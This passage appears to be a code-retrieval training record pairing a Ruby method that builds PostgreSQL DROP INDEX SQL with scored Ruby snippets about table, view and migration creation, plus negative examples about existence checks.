"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def scaffold_auto_complete_name_sql\n scaffold_auto_complete_options[:sql_name]\n end",
"def add_view_code\n return '' if (data = @record.send(@yaml['name'])).blank?\n\n table, form_name = @yaml['view'].split(/\\ |\\,/).delete_if { |e| e.blank? }\n url = @parent.url_for(controller: 'cmsedit', id: data, action: :edit, table: table, form_name: form_name, readonly: true, window_close: 1 )\n icon = @parent.mi_icon('eye-o md-18')\n %(<span class=\"dc-window-open\" data-url=\"#{url}\"> #{icon}</span>)\nend",
"def create_analysis_tables_and_views\n puts \"====================\"\n puts \"creating analysis tables and views for #{self.name}\"\n puts \"====================\"\n\n run_analysis_tables\n run_analysis_views\n\n puts \"> done\"\n puts \"====================\"\n end",
"def table_or_view_comment\n ActiveRecord::Base.connection.schema_cache.clear!\n if self.class.view_exists?(table_name)\n res = self.class.connection.execute \"select obj_description('#{table_name}'::regclass) c\"\n res[0]['c']\n else\n ActiveRecord::Base.connection.table_comment(table_name)\n end\n rescue StandardError\n nil\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"../../migration/templates/create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def create_tbilisi_precincts(month)\n vl_name = \"#{@year} #{month} voters list\"\n view_name = \"#{vl_name} - #{@shapes[:tbilisi_precinct]}\"\n @client.query(\"drop view if exists `#{view_name}`\")\n sql = \"create view `#{view_name}` as\n select `region` AS `region`,\n `district_id` AS `district_id`,\n `district_name` AS `district_name`,\n `precinct_id` AS `precinct_id`,\n concat(cast(`district_id` as char charset utf8),\n '.',\n cast(`precinct_id` as char charset utf8)) AS `precinct_name`,\n `prec_id_from_data` AS `prec_id_from_data`,\n `avg_age` AS `avg_age`,\n `greater_99` AS `greater_99`,\n `85_99` AS `85_99`,\n `less_than_85` AS `less_than_85`,\n `no_birthdate` AS `no_birthdate`,\n `total_voters` AS `total_voters`,\n `duplicates` AS `duplicates`\n from `#{vl_name} - raw`\n where (`district_id` between 1 and 22)\n order by `district_id`\"\n\n results = @client.query(sql)\nend",
"def OLDview_data db, sql, options\n outputfile = options[:output_to]\n formatting = options[:formatting]\n headers = options[:headers]\n #str = db.get_data sql\n rs = db.execute_query sql\n str = rs.content\n columns = rs.columns\n #puts \"SQL: #{sql}.\\nstr: #{str.size}\"\n data = []\n if headers\n data << columns.join(\"\\t\")\n end\n str.each {|line| data << line.join(\"\\t\"); }\n #puts \"Rows: #{data.size}\"\n require 'tempfile'\n tmpfile = Tempfile.new('SQL.XXXXXX')\n filename = tmpfile.path\n filename = Shellwords.escape(filename)\n #puts \"Writing to #{filename}\"\n tmpfile.write(data.join(\"\\n\"))\n tmpfile.close # need to flush, otherwise write is buffered\n headerstr=nil\n if formatting\n headerstr = \"-H\" unless headers\n # sometimes this can be slow, and it can fault on UTF-8 chars\n system(\"cat #{filename} | term-table.rb #{headerstr} | sponge #{filename}\")\n end\n if outputfile\n #puts \"comes here\"\n system(\"cp #{filename} #{outputfile}\")\n filename = outputfile\n end\n system \"wc -l #{filename}\" if $opt_debug\n \n #system \"$EDITOR #{filename}\"\n system \"vim -c ':set nowrap' #{filename}\"\n tmpfile.close\n tmpfile.unlink\nend",
"def create_migration_file\r\n migration_template 'migration.rb', 'db/migrate/create_baby_dove_model_data.rb'\r\n end",
"def create_views file_name\n %W(list_item main_item).each do |view|\n create_file \"app/views/#{file_name.pluralize}/_#{view}.html.#{options.views.downcase}\", File.read(File.join(File.expand_path('../templates', __FILE__), \"/views/_empty.html.#{options.views.downcase}\"))\n end\n \n # Copy collection views.\n #\n %W(collection list pagination table).each do |view|\n create_file \"app/views/#{file_name.pluralize}/_#{view}.html.#{options.views.downcase}\", File.read(File.join(File.expand_path('../templates', __FILE__), \"/views/_#{view}.html.#{options.views.downcase}\"))\n end\n end",
"def rename_materialized_view(name, new_name, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :rename_to => new_name\n }, options).to_sql\n end",
"def scaffold_views\n #%w(list show new edit)\n %w(list show)\n end",
"def transitions\n\t\tadd(\"start\",0)\n\t\tadd(\"CREATE\",1)\n\t\tadd(\"TABLE\",2)\n\t\tadd(\"TableName\",3)\n\t\tadd(\"(\",4)\n\t\tadd(\"COLUMN_NAME\",5)\n\t\tadd(\"COLUMN_TYPE\",6)\n\t\tadd(\"COLUMN_CONSTRAINTS\",7)\n\t\tadd(\"TABLE_CONSTRAINTS\",8)\n\t\tadd(\");\",9)\n\tend",
"def add_view(kind, template)\n id = \"#{kind}.view\"\n transitions = {\n edit: \"#{kind}.update\",\n list: \"#{kind}.list\",\n delete: \"#{kind}.list\",\n }\n add_display(View.new(kind, id, template, transitions))\n end",
"def view_flow; end",
"def get_views\n connect_db.fetch(\"SELECT RDB$RELATION_NAME, RDB$VIEW_SOURCE FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NOT NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)\")\n end",
"def view(name, opts = {})\n View.create(model, name, opts)\n create_view_method(name)\n end",
"def construct_view()\n design_docs = [\"couchdb_views/content_views.json\"]\n design_docs.each { |design_doc|\n #Read the file\n content = File.read(Pathname.new(File.dirname(__FILE__) + \"/../../\" + design_doc).cleanpath)\n check_sum = generateCheckSum(content)\n \n #create the JSON\n design_doc_as_json = JSON.parse(content)\n design_doc_as_json[:content_hash] = check_sum\n \n #upload the JSON as a design document\n upsert_doc(@db, design_doc_as_json, design_doc_as_json, :content_hash, @log)\n }\n end",
"def copy_view_files #do NOT change the name of this method \n # it must be overriding an existing one in a parent class\n base_path = File.join(\"app/views\", class_path, file_name)\n #binding.pry\n empty_directory base_path\n @actions = actions.nil? || actions.empty? ? %w(index new create edit update destroy) : actions\n @attr_cols = GeneratorUtils::attr_cols(table_name)\n @col_count = @attr_cols.count\n @col_count += 1 if @actions.include?(\"edit\")\n @col_count += 1 if @actions.include?(\"destroy\")\n @search_sort = options.search_sort?\n (@actions - %w(create update destroy)).each do |action|\n @action = action\n formats.each do |format|\n @path = File.join(base_path, filename_with_extensions(action, format))\n set_template(@action, @path)\n end\n end\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def generateColumnDef()\n res=@conn.exec(\"select tablename from pg_tables where schemaname='public'\")\n classObj = \"\"\n for i in res\n classObj = classObj + \"\\n\\n\\n== \"+ i[0].to_s + \"\\n\"\n classObj = classObj + genrateTabledesc(i[0].to_s)\n classObj = classObj + \"\\n\"\n classObj = classObj + \".Properties\\n\"\n classObj = classObj + \"[frame=\\\"none\\\",options=\\\"header\\\"]\\n\"\n classObj = classObj + \"|======================================================================================\\n\"\n classObj = classObj + \"| | Data Type | Description \\n\"\n classObj = classObj + self.singleTableColDef(i.to_s)\n classObj = classObj + \"|======================================================================================\\n\"\n classObj = classObj + \"=== Links\\n\"\n classObj = classObj + self.generateForeignKeyDef(i.to_s)\n classObj = classObj + \"=== Methods\\n\"\n classObj = classObj + self.generateStoredProcDef(i.to_s)\n end\n puts classObj\n return classObj\n end",
"def banner\n \"Usage: #{$0} mwd_scaffold ModelName [field:type, field:type]\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end"
] |
[
"0.76422477",
"0.7080754",
"0.69882655",
"0.6876096",
"0.6707558",
"0.6691078",
"0.66169316",
"0.6589881",
"0.65825975",
"0.6561772",
"0.6553956",
"0.638153",
"0.6370509",
"0.6340597",
"0.62826496",
"0.6160476",
"0.615917",
"0.61341274",
"0.601144",
"0.5997561",
"0.5932272",
"0.58937454",
"0.5822132",
"0.5817782",
"0.5786249",
"0.57848305",
"0.576502",
"0.5748557",
"0.57372665",
"0.5705269",
"0.5699654",
"0.5659555",
"0.56329834",
"0.5610649",
"0.56082505",
"0.5600662",
"0.5591573",
"0.5585946",
"0.5565684",
"0.5525851",
"0.55146056",
"0.5498873",
"0.54977584",
"0.5484769",
"0.5483056",
"0.54603225",
"0.5458453",
"0.5453181",
"0.54364073",
"0.54339236",
"0.5423974",
"0.5423192",
"0.54192466",
"0.5414576",
"0.54019946",
"0.53930527",
"0.5380233",
"0.5372001",
"0.53178596",
"0.5299678",
"0.5296617",
"0.5294676",
"0.52921164",
"0.5291724",
"0.52909493",
"0.52822745",
"0.52763325",
"0.5264283",
"0.5260967",
"0.525575",
"0.52510566",
"0.5248561",
"0.52371216",
"0.5236617",
"0.523631",
"0.5225148",
"0.52174073",
"0.5190193",
"0.51762414",
"0.51684934",
"0.5167292",
"0.51632345",
"0.5142389",
"0.51410514",
"0.51410043",
"0.5138868",
"0.513568",
"0.51271325",
"0.51213574",
"0.51170903",
"0.51125133",
"0.51114047",
"0.5110269",
"0.5089899",
"0.5082506",
"0.50600713",
"0.50536555",
"0.5032642",
"0.50317705",
"0.50286794"
] |
0.7618731
|
1
|
SQL for dropping a function from the database.
|
def drop_function_sql(name, opts=OPTS)
"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_function(function_name, options)\n\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def to_drop_constraint_sql(db)\n if db.supports_external_drop_constraints?\n gen = ::Sequel::Schema::AlterTableGenerator.new(db)\n gen.drop_constraint(self.name)\n db.send(:alter_table_sql_list, relvar.namespace_qualified_name(db), gen.operations)[0]\n else\n \"\"\n end\n end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def to_maql_drop\n maql = \"\"\n [ attributes, facts ].each do |obj|\n maql += obj.to_maql_drop\n end\n maql += \"DROP {#{self.identifier}};\\n\"\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete(sql, name = nil) end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete_sql(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def uninstall_on(db, options = {})\n buffer, sql = \"\", \"\"\n all_objects_in_order.reverse.each{|o| \n sql = o.to_clean_sql(db)\n (buffer << sql << \";\\n\") unless sql.nil? or sql.empty?\n }\n execute_ddl(db, buffer, options)\n db\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def remove_stock(db,stock_ticker)\r\n db.execute(<<-SQL\r\n DELETE FROM stocks2 \r\n Where stock_ticker=\"#{stock_ticker}\";\r\n SQL\r\n )\r\n puts \"===================================================\"\r\n puts \"#{stock_ticker} has been removed from the database.\"\r\n puts \"===================================================\"\r\nend",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}\"\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def drop_index_sql(table, op)\n \"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))} ON #{quote_schema_table(table)}\"\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def drop_column(table, *args)\n alter_table(table) {drop_column(*args)}\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop(database = \"\", user=\"\", password=\"\")\n if (user.empty?)\n user = @user\n end\n if (password.empty?)\n password = @password\n end\n if (database.empty?)\n database = @database\n end\n check_params(user,password,database)\n\n cmd = \"mysql --user=#{user} --password=#{password} -e 'drop database #{database};' #{database}\"\n # puts \"cmd = \" + cmd\n system cmd\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def uninstall!(database)\n drop_extension(database)\n make_uninstall(database)\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def drop_index\n call(ft_drop)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop _args\n \"drop _args;\" \n end",
"def db_remove prod\n $db.query \"DELETE FROM produtos WHERE prod=?\", prod\nend",
"def drop_index_sql(table, op)\n sch, _ = schema_and_table(table)\n \"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{\"#{quote_identifier(sch)}.\" if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}\"\n end",
"def delete_characters\n @db.execute(\"DROP TABLE Characters\")\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def drop\n Aptly::runcmd \"aptly mirror drop #{@name.quote}\"\n end",
"def invoke_drop(method_or_key); end",
"def exec_delete(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"delete\", binds) { query(sql, binds) }\r\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend"
] |
[
"0.8369946",
"0.80704874",
"0.8003502",
"0.7982197",
"0.7879706",
"0.76229805",
"0.76229805",
"0.75548965",
"0.7380597",
"0.71375334",
"0.71096754",
"0.70644176",
"0.68965197",
"0.68872184",
"0.68156517",
"0.6793039",
"0.67553425",
"0.6700025",
"0.66806155",
"0.66347694",
"0.6625797",
"0.6619604",
"0.6598128",
"0.6590546",
"0.65731144",
"0.6572026",
"0.6569278",
"0.6563033",
"0.65590364",
"0.6521623",
"0.65032053",
"0.6486281",
"0.64653194",
"0.64653194",
"0.639045",
"0.63517964",
"0.63397706",
"0.6338351",
"0.63306344",
"0.6319139",
"0.6314238",
"0.63052225",
"0.6293412",
"0.62834543",
"0.62778926",
"0.62587357",
"0.6250159",
"0.6236936",
"0.61820924",
"0.61646056",
"0.6163628",
"0.6152445",
"0.6144435",
"0.61410135",
"0.6116182",
"0.61127067",
"0.61058915",
"0.61058915",
"0.61019045",
"0.6089666",
"0.6080112",
"0.606983",
"0.6059789",
"0.6054124",
"0.6053217",
"0.6044683",
"0.6038642",
"0.602959",
"0.602225",
"0.6017064",
"0.6010362",
"0.6008879",
"0.6008879",
"0.5983149",
"0.5973049",
"0.5971153",
"0.59678966",
"0.59483254",
"0.5942069",
"0.59291595",
"0.5921536",
"0.59135234",
"0.5900768",
"0.5887252",
"0.5875814",
"0.5875105",
"0.58731365",
"0.5867684",
"0.586719",
"0.5866774",
"0.58659995",
"0.5862043",
"0.5857486",
"0.58499116",
"0.5849035",
"0.58430636",
"0.58283234",
"0.58243114",
"0.5823378",
"0.5822092"
] |
0.8339578
|
1
|
Support :if_exists, :cascade, and :concurrently options.
|
def drop_index_sql(table, op)
sch, _ = schema_and_table(table)
"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{"#{quote_identifier(sch)}." if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def continue_on_exists_proc; end",
"def on_exists_proc; end",
"def exists?; end",
"def continue_on_exists_proc=(_arg0); end",
"def on_exists_proc=(_arg0); end",
"def exists?\n self.ensure == :present\n end",
"def exists?\n false\n end",
"def exists?\n false\n end",
"def exists?\n true\n end",
"def exists?\n !!async\n end",
"def exists!\n @exists = true\n end",
"def exists_bulk_method(states = [nil, :found])\n prepare_environment\n @item = @resource_type.new(@client, @data)\n return true if empty_data_check(states)\n @property_hash[:ensure] == :present\nend",
"def exists\n @deleted = false\n @exists = true\n end",
"def exist\n\treturn true\n end",
"def exist?\n true\n end",
"def exist?(name, options = T.unsafe(nil)); end",
"def create_if_not_exists\n args = [\n [available_list_key(), taken_hash_key(), created_at_key()],\n [@resource_count, @expiration, Time.now.to_f()]\n ]\n $redis.eval(create_script(), *args)\n end",
"def exists?\n fail NotImplementedError\n end",
"def exists?()\n end",
"def existent; end",
"def exists?\n\t\treturn false\n\tend",
"def exist?\n raise NotImplementedError\n end",
"def resource_exists?\n reload!\n @exists = true\n rescue Google::Cloud::NotFoundError\n @exists = false\n end",
"def exist?\n @exists\n end",
"def supports_indexes_in_create?\n false\n end",
"def supports_indexes_in_create?\n false\n end",
"def exist?\n nil\n end",
"def existing?\n @existing\n end",
"def exists? args = {}\n RedisModelExtension::Database.redis {|r| r.exists(self.name.constantize.generate_key(args)) }\n end",
"def exists?\n properties[:ensure] != :absent\n end",
"def add_if_not_exists()\n\tif record_exists()\n\t\tprintf(\"EXISTS %s\\n\",self.digest)\n\t\treturn 0\n\tend\n\tsave()\n\treturn 1\nend",
"def supports_create_table_if_not_exists?\n true\n end",
"def batch_exist?(id)\n mutex(id) do |bid|\n redis.exists(bid)\n end\n end",
"def exists?\r\n !new? && self.class.exists?(id, prefix_options)\r\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def find_or_create!()\n end",
"def exists(id, options = ExistsOptions.new)\n resp = @backend.document_exists(bucket_name, \"#{@scope_name}.#{@name}\", id, options.timeout)\n ExistsResult.new do |res|\n res.status = resp[:status]\n res.partition_id = resp[:partition_id]\n res.cas = resp[:cas] if res.status != :not_found\n end\n end",
"def exists?(identifier, configuration = {}); true; end",
"def merge_if_exists!\n t = merge_if_exists || self\n t.save!\n end",
"def create?\n create = self[:create]\n return create unless create.nil?\n options.fetch 'create', false\n end",
"def exists?()\n #This is a stub, used for indexing\n end",
"def exists?\n !new? && self.class.exists?(id, prefix_options)\n end",
"def exist?(k, ignored_options = nil)\n handle_fork\n _exist? k\n end",
"def data_query_exists?\n # TODO: add_data_query.php says: \"If the data query was already associated, it will be reindexed\"\n # we may need to figure it out somehow to avoid reindexes.\n #\n # use --check patch: returns true if data query does not exist, returns false if data query exists\n # will raise exception, when option not supported\n r = add_data_query(params + ' --check')\n !r\nrescue\n false\nend",
"def exists?\n Puppet.debug(self.class.to_s.split('::').last + ': Calling exists method : ')\n @property_hash[:ensure] == :present\n end",
"def exists(_obj)\n raise NotImplementedError\n end",
"def exists?\n SideJob.redis.sismember 'jobs', id\n end",
"def exist?\n @created\n end",
"def _create_record(options = {})\n super\n update_index if create_needs_index? && options.fetch(:update_index, true)\n true\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?\n !@exists.nil? && @exists\n end",
"def exists?(object); end",
